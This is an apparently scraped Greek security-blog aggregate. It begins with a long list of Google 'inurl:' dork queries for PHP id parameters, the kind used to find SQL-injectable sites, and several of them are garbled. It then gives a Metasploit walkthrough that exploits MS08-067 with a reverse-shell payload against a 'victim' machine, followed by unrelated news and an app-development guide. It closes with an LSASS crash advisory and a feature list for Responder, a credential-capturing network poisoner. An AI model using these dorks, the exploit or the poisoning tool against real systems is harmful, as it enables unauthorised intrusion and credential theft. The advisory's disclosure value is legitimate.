    inurl:shopping.php?id=
    inurl:productdetail.php?id=
    inurl:post.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurl:page.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurl:product_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:transcript.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:pages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurl:opinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurl:offer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurllay_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurlageid=
    inurl:games.php?id=
    inurlage.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurltray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?avd=
    inurl:event.php?id=
    inurlroduct-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:fiche_spectacle.php?id=
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurlreview.php?id=
    inurl:loadpsb.php?id=
    inurlpinions.php?id=
    inurl:spr.php?id=
    inurlages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurlarticipant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurlrod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurlerson.php?id=
    inurlroductinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurlrofile_view.php?id=
    inurl:category.php?id=
    inurlublications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurlrod_info.php?id=
    inurl:shop.php?do=part&id=
    inurlroductinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurlroduct.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurlroduit.php?id=
    inurlop.php?id=
    inurl:shopping.php?id=
    inurlroductdetail.php?id=
    inurlost.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurlage.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurlroduct_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:transcript.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurlroduct-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:review.php?id=
    inurl:loadpsb.php?id=
    inurl:ages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurlpinions.php?id=
    inurl:announce.php?id=
     

    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurlffer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=

    Πρόσβαση σε απόμακρο υπολογιστή με χρήση του ms08_, ex067_netapi exploit

    $
    0
    0


    Σε αυτό το tutorial θα δούμε έναν από τους τρόπους με τους οποίους μπορούμε να αποκτήσουμε τον έλεγχο σε ένα απομακρυσμένο υπολογιστή με τη χρήση του ms08_067_netapi exploit.




    Ανοίγω ένα τερματικό...
    Terminal: 
    root@bt:msfconsole <- font="">->
    [περιμένουμε να ενεργοποιηθεί λίγο το msfconsole]...
    msf > search ms08_067_netapi <- font="">->

    [*] Searching loaded modules for pattern 'ms08_067_netapi'...
    Exploits
    ========
    Name
    ----
    windows/smb/ms08_067_netapi
    Corruption
    Rank
    ----
    great
    Description
    -----------
    Microsoft Server Service Relative Path Stack


    Συνχίζουμε γράφοντας τις παρακάτω εντολές...



    msf > use windows/smb/ms08_067_netapi <- span="">
    msf exploit(ms08_067_netapi) > show options <- span="">
    msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130 <- ip="" span="" victim="">
    RHOST => 192.168.33.130
    msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp <- span="">
    PAYLOAD => windows/shell/reverse_tcp
    msf exploit(ms08_067_netapi) > show options <- span="">
    msf exploit(ms08_067_netapi) > set LHOST 192.168.33.130 <- attacker="" ip="" span="">
    LHOST => 192.168.33.130
    msf exploit(ms08_067_netapi) > exploit <- span="">

    [*] Started reverse handler on 192.168.33.129:8080
    [*] Triggering the vulnerability...
    [*] Sending stage (748032 bytes)
    [*] Meterpreter session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1487)

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>->
    ->
    ->
    ->
    ->
    ->
    ->

    GAME OVER!!!

    Όπως φαίνεται παραπάνω μπήκαμε στον υπολογιστή του θύματος μας και έχουμε μπροστά μας το μενού εντολών του MS-DOS... Από εκεί και πέρα μπορούμε να κάνουμε ότι θέλουμε αρκεί να γνωρίζουμε έστω και λίγες εντολές του MS-DOS.

    ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

    via: securitydnainfo.blogspot.gr

    Το NATO δέχεται 500 επιθέσεις hacking το μήνα!

    $
    0
    0


    Tο NATO αποτελεί στόχο για πολλούς hackers παγκοσμίως καθώς σύμφωνα με πρόσφατο δημοσίευμα δέχεται κάθε μήνα κατά μέσο όρο 500 επιθέσεις.







    Ο Oana Lungescu, εκπρόσωπος του ΝΑΤΟ, δήλωσε στο CNN ότι σημειώνεται αύξηση περίπου 60% του αριθμού των επιθέσεων το 2016 σε σχέση με το 2015. Συνήθως, η ταυτότητα των εισβολέων είναι δύσκολο να προσδιοριστεί παρόλο που γίνονται άμεσα έρευνες για τον εντοπισμό τους. Αναμφίβολα, οι ξένες κυβερνήσεις, οι εγκληματίες και οι τρομοκράτες αποτελούν πιθανή προέλευση των επιθέσεων αλλά σύμφωνα με τους ειδικούς ο υποψήφιος που κερδίζει με διαφορά είναι τα αντίπαλα έθνη.

    Το μόνο σίγουρο είναι ότι το ΝΑΤΟ ξέρει πώς να διαχειριστεί την κατάσταση. Συγκεκριμένα, στα μέσα του 2016 προειδοποίησε του hackers ότι αν επιδιώξουν και άλλες επιθέσεις θα έχουν να αντιμετωπίσουν την απάντηση του συνόλου της συμμαχίας στο πλαίσιο του “Article V”, το σύμφωνο της αμοιβαίας άμυνας. «Έχουμε αποφασίσει στην επόμενη διαδικτυακή επίθεση να ανταποδώσουμε με παρόμοιο τρόπο όλο το σύνολο της συμμαχίας ενωμένο» προειδοποίησε ο Jens Stoltenberg. Συνεχίζοντας ο κύριος Stoltenberg τόνισε ότι λαμβάνουν πολύ σοβαρά τις επιθέσεις στον κυβερνοχώρο τους και τις αντιμετωπίζουν με τον ίδιο τρόπο που θα έκαναν σε περίπτωση ένοπλης επίθεσης.

    Σύμφωνα με φήμες η Ρωσία είναι η πιθανή χώρα που κρύβεται πίσω από τις επιθέσεις αυτές μια τακτική που ακολούθησε και στις ΗΠΑ κατά την διάρκεια της εκλογικής αναμέτρησης του 2016. Δεδομένου αυτού οι ευρωπαϊκές κυβερνήσεις βρίσκονται σε επιφυλακή για μελλοντικές επιθέσεις από την ρωσική πλευρά κατά την διάρκεια των δικών τους εκλογικών αναμετρήσεων.

    Από την άλλη πλευρά, η Ρωσία αρνείται τις κατηγορίες αυτές υποστηρίζοντας πως όχι απλά δεν είναι ο θύτης αλλά είναι το θύμα παρόμοιων επιθέσεων.









    Πηγή: secnews

    Έχω Μια Ιδέα Για Μια Φοβερή Εφαρμογή, Αλλά Από Που Να Ξεκινήσω;

    $
    0
    0

    Έχετε μια ιδέα για μια φοβερή εφαρμογή και δεν μπορείτε να ησυχάσετε αν δεν την κατασκευάσετε. Αλλά δεν ξέρετε τίποτα από προγραμματισμό και δεν έχετε ιδέα για το πώς να ξεκινήσετε.
    Αν θέλετε βοήθεια για να υλοποιήσετε την ιδέα σας και να χτίσετε πραγματικά μια επιχείρηση γύρω από αυτήν, εμείς είμαστε εδώ για να βοηθήσουμε!. Αλλά αν θέλετε να βουτήξετε και να χτίσετε πραγματικά κάτι, τότε διαβάστε μια επισκόπηση υψηλού επιπέδου για το από που να ξεκινήσετε, με μια σειρά από διαφορετικές προσεγγίσεις για την οικοδόμηση της εφαρμογής σας. Το σημαντικό πράγμα που πρέπει να θυμάστε είναι πως οτιδήποτε εμπνευστήκατε να φτιάξετε, φτιάξτε το αμέσως., απλώς ξεκινήστε.
    Θα κάνουμε την προσέγγιση ξεκινώντας γρήγορα να κατασκευάσουμε ένα ελάχιστο βιώσιμο προϊόν (MVP). Ως εκ τούτου, η πιο σημαντική ερώτηση που πρέπει να κάνετε πρώτα στον εαυτό σας είναι η εξής …

    Ερώτηση 1: Τι είδους εφαρμογή θέλω να κατασκευάσω;


    Η απάντηση σε αυτό οδηγεί σε δύο άλλα ερωτήματα:
    1.Πώς θέλω να την χρησιμοποιήσουν οι άνθρωποι;
    2.Τι τεχνολογίες γνωρίζω ή θέλω να μάθω;
    Για το πρώτο ερώτημα, θέλετε οι άνθρωποι να τη χρησιμοποιούν ως μια εφαρμογή web σε κοινό επιτραπέζιο ή φορητό υπολογιστή; Μια εφαρμογή για smartphone που θα παίρνουν από ένα κατάστημα εφαρμογών (συνήθως γνωστή ως «native» εφαρμογή); Ή τι θα λέγατε με μια εφαρμογή web αναβαθμισμένη για χρήση smartphone; Ο απώτερος στόχος σας μπορεί να είναι να έχετε όλες αυτές τις επιλογές διαθέσιμες, αλλά αυτό έχει μεγάλη δυσκολία αν ξεκινάτε μόλις τώρα, μόνοι σας. Διαλέξτε μία και συγκεντρωθείτε σ’αυτήν, αλλά να έχετε και άλλες επιλογές υπόψιν, καθώς η πολυπραγμοσύνη θα μπορούσε να επηρεάσει τον τρόπο που σχεδιάζετε.
    Η δεύτερη ερώτηση (Τι τεχνολογίες γνωρίζω ή θέλω να μάθω) μπορεί επίσης να παίξει ένα μεγάλο ρόλο στο πώς θέλετε να προχωρήσετε. Στο υπόλοιπο του άρθρου θα προσπαθήσω να παρέχω πληροφορίες για όποια διαδρομή κι αν αποφασίσετε.

    Μια Σημείωση για την Αρχιτεκτονική Λογισμικού

    Αν έχετε πληροφορίες για την εφαρμογή σας που θέλετε να αποθηκευτούν στο διαδίκτυο- κωδικούς σύνδεσης, φωτογραφίες, αποτελέσματα-οτιδήποτε, τότε θα θέλετε να εξετάσετε μια αρχιτεκτονική επικεντρωμένη στις υπηρεσίες .
    Τι πράγμα;
    Δεν θέλω να προχωρήσω πάρα πολύ στις λεπτομέρειες εδώ, αλλά παίρνοντας τη σωστή απόφαση εξαρχής μπορεί να σώσει πολύ χρόνο και κόπο στο μέλλον. «Υπηρεσιο-κεντρική-Αρχιτεκτονική» σημαίνει ότι κατασκευάζετε ένα σύστημα όπου η πληροφόρηση και η λειτουργικότητα διατίθεντε στο διαδίκτυο ως κλήσεις service που κάθε εφαρμογή ή πρόγραμμα μπορεί να κάνει και να χρησιμοποιεί.
    Φανταστείτε ότι η ιδέα σας περιλαμβάνει φωτογραφίες που εμφανίζονται για το χρήστη. Αν ξεκινήσετε με μία προσέγγιση μόνο βασισμένη στο web, μπορεί να κάνετε το λάθος να ενσωματώσετε στενά την ιστοσελίδα σας με τη βάση δεδομένων των φωτογραφιών, και κάθε φωτογραφία θα μπορούσε να επιστρέψει στο πρόγραμμα περιήγησης με HTML και JavaScript γύρω της για να λειτουργήσει σωστά για το site σας. Αλλά τι συμβαίνει όταν αποφασίσετε να φτιάξετε μια εφαρμογή Android; Τώρα θα θέλετε να ζητήσετε τις ίδιες φωτογραφίες από την εφαρμογή σας, αλλά όλα αυτά τα HTML και JavaScript δε σας κάνουν κανένα καλό.
    Αντ ‘αυτού, διασπάτε τα απλούστερα στοιχεία που χρειάζεστε με το απλούστερο δυνατό format (συχνά JSON σήμερα) και να κάνετε αυτό διαθέσιμο ως αίτημα για όποιον το θέλει. Τώρα κάθε ενδιαφερόμενος (ένα πρόγραμμα περιήγησης, μια εφαρμογή smartphone, μια εφαρμογή τηλεόρασης, κλπ.) μπορεί να ζητήσει αυτά τα δεδομένα και να τα χειριστεί με όποιον τρόπο απαιτείται για το συγκεκριμένο περιβάλλον χρήστη.

    Ερώτηση 2: Χρειάζομαι νέο υπολογιστή;

    ibm-pc
    Μάλλον όχι! Το μόνο είδος εφαρμογής που μπορεί να σας ζητήσει να αγοράσετε (ή να δανειστείτε) ένα νέο υπολογιστή, είναι μια εφαρμογή iOS , η οποία μπορεί να αναπτυχθεί μόνο σε έναν υπολογιστή Mac. Για μια εφαρμογή web ή Android μπορείτε να χρησιμοποιήσετε οποιοδήποτε υπολογιστή Mac, Windows ή Linux.
    Οι καλύτεροι υπολογιστές σίγουρα κάνουν τον προγραμματισμό να κινηθεί λίγο πιο γρήγορα, αλλά δεν είναι απαραίτητο να αγοράσετε νέο υπολογιστή εκτός αν ο σημερινός σας είναι αφόρητα αργός για τον προγραμματισμό. Έχω ένα παλιό laptop HP με Windows 7, το οποίο εξακολουθεί να είναι αξιοπρεπές για την ανάπτυξη Android, και πέρυσι χρησιμοποίησα ενός φίλου ένα παλιό Snow Leopard Macbook για iOS και ήταν πολύ καλό, επίσης. Έτσι, δεν χρειάζεται να ανησυχείτε πάρα πολύ για το πόσο σύγχρονος θα παραμείνει στο χρόνο, αλλά θα θέλετε να έχετε τον καλύτερο υπολογιστή που μπορείτε να αντέξετε οικονομικά.

    Ερώτηση 3:Ποια εργαλεία προγραμματισμού χρειάζομαι;

    tools
    Για εφαρμογές web, μπορείτε να αρκεστείτε σε οποιοδήποτε παλιό πρόγραμμα επεξεργασίας κειμένου, όπως το NotePad, το TextEdit, ή το Sublime Text 2. Οι εφαρμογές Smartphone, ή οι εφαρμογές για άλλους τύπους συσκευών συνήθως απαιτούν ειδικά προγράμματα που ονομάζονται IDEs, από τις λέξεις «Integrated Development Environment». Αυτά τα εργαλεία σας επιτρέπουν να γράψετε κώδικα και να κατασκευάσετε έργα που μπορούν να τρέχουν σε κινητά τηλέφωνα, tablets, τηλεοράσεις, ή άλλους τύπους συσκευών.
    Για εφαρμογές smartphone, τα εργαλεία προγραμματισμού είναι δωρεάν τόσο για iOS (Xcode) όσο και για Android (Eclipse). Η Microsoft επίσης κάνει τη ζωή πιο εύκολη για τους προγραμματιστές που θέλουν να ξεκινήσουν την ανάπτυξη εφαρμογών για τα Windows Phones-Το Visual Studio Express 2012 είναι δωρεάν και είναι παρόμοιο με το Xcode και το Eclipse. Και δεν χρειάζεστε καν ένα smartphone για να δοκιμάσετε αυτές τις πλατφόρμες (αν και θα σας βοηθούσε). Όλα αυτά τα εργαλεία περιέχουν εικονικά τηλέφωνα, που μπορείτε να τρέξετε στον υπολογιστή σας και να χρησιμοποιήσετε για να ελέγξετε την εφαρμογή σας. Οι δοκιμές σε μια συσκευή είναι καλύτερες και γρηγορότερες, αλλά τα εικονικά τηλέφωνα είναι σπουδαία και είναι δωρεάν!
    Εάν αναπτύσσετε την εφαρμογή ενός smartphone, μπορεί να θέλετε να εξετάσετε ορισμένες non-native λύσεις, όπως το PhoneGapή το Titanium, που σας επιτρέπουν να γράψετε εφαρμογές για Android, iOS, και το web όλα με τη μία. Το καθένα έχει τα δικά του πλεονεκτήματα και μειονεκτήματα, αλλά έχω δει καλές (όχι σπουδαίες) εφαρμογές χτισμένες με αυτά τα εργαλεία.
    Εργαλεία όπως αυτά σας επιτρέπουν να γράψετε μητρικές ή υβριδικές (web εφαρμογές ενσωματωμένες στο μητρικό shell) εφαρμογές που χρησιμοποιούν τις τεχνολογίες web, όπως HTML και JavaScript. Τα εργαλεία δημιουργούν εκδόσεις της εφαρμογής για πολλαπλές πλατφόρμες, και μπορείτε ακόμη να ανεβάσετε τις διαφορετικές εκδόσεις σε μέρη όπως το Google Play και το App Store. Αυτό μπορεί να είναι μια πολύ καλή λύση για ορισμένες εφαρμογές, ή για να ξεκινήσετε γρήγορα, αλλά τελικά μάλλον θα εξυπηρετηθείτε καλύτερα κατασκευάζοντας μητρικές εφαρμογές προσαρμοσμένες σε κάθε πλατφόρμα.

    Ερώτηση 4: Πόσο θα κοστίσει;

    Hidden-costs
    Η εγγραφή και η φιλοξενία web εφαρμογών απαιτεί συνήθως μια μικρή μηνιαία ή ετήσια συνδρομή, αλλά τα ίδια τα εργαλεία τους είναι συνήθως δωρεάν ή φθηνά.
    Τα εργαλεία για smartphone εφαρμογές είναι επίσης δωρεάν, αλλά η δημοσίευση εφαρμογών σε ειδικά καταστήματα έχει ένα μικρό κόστος. Η Apple και η Microsoft χρεώνουν μια ετήσια συνδρομή των $ 100 και η Google χρεώνει ένα εφάπαξ τέλος των $ 25.

    Ερώτηση 5: Πώς ξεκινάω να γράφω την εφαρμογή;

    Αν δεν έχετε γράψει μια εφαρμογή ποτέ πριν, τότε κατά πάσα πιθανότητα θα θέλετε να χρησιμοποιήσετε μία πηγή, όπως το Treehouse για να εργαστείτε μέσα από κάποια μαθήματα για το πώς να οικοδομήσετε μια απλή webAndroid, ή iPhone εφαρμογή. Όσο κι αν φαίνεται διασκεδαστικό να ξεκινήσετε αμέσως και να παίζετε με τον κωδικό, θα χρειαστείτε τουλάχιστον μια βασική κατανόηση, για το πως είναι δομημένες οι εφαρμογές.
    Υπάρχουν κι άλλες αναρτήσεις στο blog που μπορούν να σας βοηθήσουν- Απλά κάντε κλικ στο iOS ή Android στο μενού πλοήγησης στην κορυφή του blog για να δείτε όλες τις αναρτήσεις σε κάθε κατηγορία. Υπάρχουν επίσης, κάποιες γρήγορες συμβουλές στο YouTube, που θα μπορούσαν να βοηθήσουν.
    Το πρώτο πράγμα που θα θελήσετε να κάνετε εάν χρησιμοποιήσετε μια νέα πλατφόρμα, είτε είναι το διαδίκτυο, το Android, iOS ή Windows Phone, είναι να δημιουργήσετε ένα απλό πρόγραμμα “Hello, World!“, για να βεβαιωθείτε ότι το περιβάλλον προγραμματισμού έχει ρυθμιστεί και λειτουργεί σωστά. Τα προγράμματα “Hello, World!” είναι σπουδαία πρώτα βήματα, επειδή είναι το ελάχιστο που μπορείτε να κάνετε για να τρέξετε ένα ολοκληρωμένο πρόγραμμα. Παρακάτω είναι μερικά καλά άρθρα και βίντεο για το πώς να γράψετε προγράμματα “Hello, World!” για τις διάφορες πλατφόρμες που έχουμε αναφέρει:

    Μια σπουδαία πηγή για να μάθετε πώς να κωδικοποιήσετε ορισμένα είδη λειτουργικότητας σε εφαρμογές, είναι το δείγμα του κώδικα που διανέμεται με εργαλεία και πλατφόρμες. Θέλετε να χρησιμοποιήσετε την κάμερα; Υπάρχουν υποδείγματα για να σας δείξουν πώς! Θέλετε να κάνετε την εφαρμογή σας με επίγνωση τοποθεσίας; Υπάρχουν υποδείγματα για να σας δείξουν πώς!
    Για τα Android και iOS, κατεβάστε, εξερευνήστε και χρησιμοποιήστε τον κωδικό που διατίθεται στα σχέδια του δείγματος: Android |iOS. Υπάρχει επίσης φανταστική ερμηνεία διαθέσιμη στις ιστοσελίδες των προγραμματιστών για το Android, iOS, Windows Phone, και άλλες πλατφόρμες.
    Καλή τύχη με την εφαρμογή σας, και ευτυχισμένη κωδικοποίηση! Αν κάνετε κάτι φοβερό, στείλτε μας ένα σημείωμα στα σχόλια παρακάτω!

    MS16-137: LSASS Remote Memory Corruption Advisory

    $
    0
    0
    Title: LSASS SMB NTLM Exchange Remote Memory Corruption
    Version: 1.0
    Issue type: Null Pointer Dereference
    Authentication: Pre-Authenticated
    Affected vendor: Microsoft
    Release date: 8/11/2016
    Discovered by: Laurent Gaffié
    Advisory by: Laurent Gaffié
    Issue status: Patch available
    Affected versions: Windows: XP/Server 2003, Vista, 7, 2008R2, Server 2012R2, 10.
    =================================================

    A vulnerability in Windows Local Security Authority Subsystem Service (LSASS) was found on Windows OS versions ranging from Windows XP through to Windows 10. This vulnerability allows an attacker to remotely crash the LSASS.EXE process of an affected workstation with no user interaction.
    Successful remote exploitation of this issue will result in a reboot of the target machine. Local privilege escalation should also be considered likely.
    Microsoft acknowledged the vulnerability and has published an advisory and a patch, resolving this issue.


    Technical details
    -----------------

    This vulnerability affects both LSASS client and server and can be triggered remotely via SMBv1 and SMBv2, during the NTLM message 3 (Authenticate) message. Incoming NTLM messages via SMB are using ASN1 and DER encoding, the first ASN length field can be set to unsigned int by using 0x84.
    This allows an attacker to remotely allocate a huge chunk of memory, for a message never larger than 20000 chars. The secondary trigger is to set any string fields (User, Domain, session Key, MIC, etc) with a long string (80-140 chars), leading LSASS.exe to crash.

    eax=00000000 ebx=000e3e04 ecx=fffffff8 edx=fffffffc esi=000e3e00 edi=00000004
    eip=7c84cca2 esp=00aaf9ac ebp=00aaf9d4 iopl=0 nv up ei pl nz ac po cy
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213
    ntdll!RtlpWaitOnCriticalSection+0xdf:
    7c84cca2 ff4014 inc dword ptr [eax+14h] ds:0023:00000014=????????

    STACK_TEXT:
    00aaf9d4 7c83cfd7 00000b3c 00000004 00000000 ntdll!RtlpWaitOnCriticalSection+0xdf
    00aaf9f4 4ab82f4a 000e3e00 00aafbec 00000000 ntdll!RtlEnterCriticalSection+0xa8 <-- a="" br="" is="" null="" pointer="" used="" with="">00aafa18 4ab82765 000e3de8 ffffffff 00000001 lsasrv!NegpBuildMechListFromCreds+0x25 <-- a="" br="" creds.="" null="" uses="">00aafbfc 4abc8fbb 00000001 00aafe40 000e3de8 lsasrv!NegBuildRequestToken+0xd9
    00aafc34 4abca13f 000e3de8 00120111 00000010 lsasrv!NegGenerateServerRequest+0x2a
    00aafc98 4ab85edb 000e3de8 00000000 00aafe40 lsasrv!NegAcceptLsaModeContext+0x344
    00aafd0c 4ab860c8 00d5f900 00d5f908 00aafe40 lsasrv!WLsaAcceptContext+0x139
    00aafe84 4ab7ae7b 00d5f8d8 005ccaf0 00599048 lsasrv!LpcAcceptContext+0x13b
    00aafe9c 4ab7ad7e 00d5f8d8 4ac22738 00d5a158 lsasrv!DispatchAPI+0x46
    00aaff54 4ab7a7c9 00d5f8d8 00aaff9c 77e5baf1 lsasrv!LpcHandler+0x1fe
    00aaff78 4ab8f448 00598ce8 00000000 00000000 lsasrv!SpmPoolThreadBase+0xb9
    00aaffb8 77e6484f 0059ade8 00000000 00000000 lsasrv!LsapThreadBase+0x91
    00aaffec 00000000 4ab8f3f1 0059ade8 00000000 kernel32!BaseThreadStart+0x34

    dt ntdll!_RTL_CRITICAL_SECTION
    +0x000 DebugInfo : Ptr32 _RTL_CRITICAL_SECTION_DEBUG
    +0x004 LockCount : Int4B
    +0x008 RecursionCount : Int4B
    +0x00c OwningThread : Ptr32 Void
    +0x010 LockSemaphore : Ptr32 Void
    +0x014 SpinCount : Uint4B

    - LSASS NegpBuildMechListFromCreds sends a null pointer "creds" to NTDLL RtlEnterCriticalSection.
    - RtlEnterCriticalSection is used with a null pointer, which triggers the crash.

    Impact
    ------

    Successful attempts will result in a remote system crash and possibly local privilege escalation.

    Affected products
    -----------------

    Windows:
    - XP
    - Server 2003
    - 7
    - 8
    - 2008
    - 2012
    - 10

    Proof of concept
    ----------------

    A proof of concept is available at the following URL:
    https://github.com/lgandx/PoC/tree/master/LSASS
    This proof of concept is fully automated and includes non-vulnerable detection.

    Solution
    --------

    Install the corresponding MS patch.
    More details:
    https://technet.microsoft.com/en-us/library/security/ms16-137.aspx

    Response timeline
    -----------------

    * 17/09/2016 - Vendor notified, proof of concept sent.
    * 28/09/2016 - Issue confirmed by MSRC
    * 14/10/2016 - Vendor says he plan to release a patch in November, that is 1 month in advance of the scheduled 3 month.
    * 08/11/2016 - Vendor release MS16-137.
    * 08/11/2016 - This advisory released.

    References
    ----------
    * https://twitter.com/PythonResponder
    * https://github.com/lgandx/Responder




    Responder.py

    LLMNR/NBT-NS/mDNS Poisoner

    Author: Laurent Gaffie https://g-laurent.blogspot.com
    Intro

    Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answer to File Server Service request, which is for SMB.

    The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want to answer to the Workstation Service request name suffix.

    Features
    Built-in SMB Auth server.

    Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. SMBv2 has also been implemented and is supported by default.
    Built-in MSSQL Auth server.

    In order to redirect SQL Authentication to this tool, you will need to set the option -r (NBT-NS queries for SQL Server lookup are using the Workstation Service name suffix) for systems older than windows Vista (LLMNR will be used for Vista and higher). This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005 & 2008.
    Built-in HTTP Auth server.

    In order to redirect HTTP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2 hashes and Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari.

    Note: This module also works for WebDav NTLM authentication issued from Windows WebDav clients (WebClient). You can now send your custom files to a victim.
    Built-in HTTPS Auth server.

    Same as above. The folder certs/ contains 2 default keys, including a dummy private key. This is intentional, the purpose is to have Responder working out of the box. A script was added in case you need to generate your own self signed key pair.
    Built-in LDAP Auth server.

    In order to redirect LDAP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin.
    Built-in FTP, POP3, IMAP, SMTP Auth servers.

    This modules will collect clear text credentials.
    Built-in DNS server.

    This server will answer type A queries. This is really handy when it's combined with ARP spoofing.
    Built-in WPAD Proxy Server.
    This module will capture all HTTP requests from anyone launching Internet Explorer on the network if they have "Auto-detect settings" enabled. This module is highly effective. You can configure your custom PAC script in Responder.conf and inject HTML into the server's responses. See Responder.conf.
    Browser Listener

    This module allows to find the PDC in stealth mode.
    Fingerprinting

    When the option -f is used, Responder will fingerprint every host who issued an LLMNR/NBT-NS query. All capture modules still work while in fingerprint mode.


    Icmp Redirect

    python tools/Icmp-Redirect.py

    For MITM on Windows XP/2003 and earlier Domain members. This attack combined with the DNS module is pretty effective.


    Rogue DHCP

    python tools/DHCP.py

